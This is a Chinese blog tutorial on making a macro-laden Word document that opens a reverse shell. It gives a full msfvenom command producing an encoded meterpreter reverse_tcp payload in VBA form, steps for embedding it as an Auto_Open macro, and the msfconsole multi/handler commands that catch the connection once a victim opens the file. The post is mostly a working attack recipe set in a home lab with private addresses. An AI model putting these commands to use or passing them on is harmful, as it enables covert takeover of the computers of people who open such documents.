利用word文档获取shell

利用word文档获取shell

先把cn_office_professional_plus_2007_dvd_X12-38713.rar上传到win7虚拟上,解压后,安装
然后打开kali生成恶意代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f vba-exe

图片[1]-利用word文档获取shell-Mx's Blog

复制代码从Uuvqcerqez开始到最后,回到win7 打开word点击视图点击宏 宏名为Auto_Open新建文档

图片[2]-利用word文档获取shell-Mx's Blog
复制第一段代码粘贴到上面保存
图片[3]-利用word文档获取shell-Mx's Blog
之后把第二段粘贴到正文保存为启用宏的文档
图片[4]-利用word文档获取shell-Mx's Blog
回到kali配置监听模块

msfconsole
msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler msf5 
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set 
LHOST 192.168.1.53 msf5 exploit(multi/handler) > jobs -K msf5 exploit(multi/handler) > exploit

配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF, 关闭word文档之后session不受影响
图片[5]-利用word文档获取shell-Mx's Blog
图片[6]-利用word文档获取shell-Mx's Blog
成功.

© 版权声明
THE END
喜欢就支持一下吧!
点赞12赞赏 分享
评论 抢沙发

请登录后发表评论